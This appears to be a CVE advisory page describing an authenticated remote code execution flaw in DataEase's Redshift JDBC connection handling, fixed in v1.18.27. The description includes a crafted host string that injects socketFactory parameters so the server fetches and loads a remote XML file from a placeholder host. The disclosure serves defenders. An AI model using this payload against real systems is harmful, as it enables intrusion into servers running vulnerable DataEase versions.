Unrated severityNVD Advisory· Published Dec 18, 2024· Updated Dec 18, 2024
Dataease Redshift Data Source JDBC Connection Parameters Not Verified Leads to RCE Vulnerability
CVE-2024-55952
Description
DataEase is an open source business analytics tool. Authenticated users can remotely execute code through the backend JDBC connection. When constructing the jdbc connection string, the parameters are not filtered. Constructing the host as ip:5432/test/?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://ip:5432/1.xml&a= can trigger the ClassPathXmlApplicationContext construction method. The vulnerability has been fixed in v1.18.27. Users are advised to upgrade. There are no known workarounds for this vulnerability.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
2Patches
Vulnerability mechanics
References
2- github.com/dataease/dataease/commit/0db4872a52eccf6e83dd9359aa05db52dd580ec1mitrex_refsource_MISC
- github.com/dataease/dataease/security/advisories/GHSA-w8qm-xw38-93qwmitrex_refsource_CONFIRM
News mentions
0No linked articles in our index yet.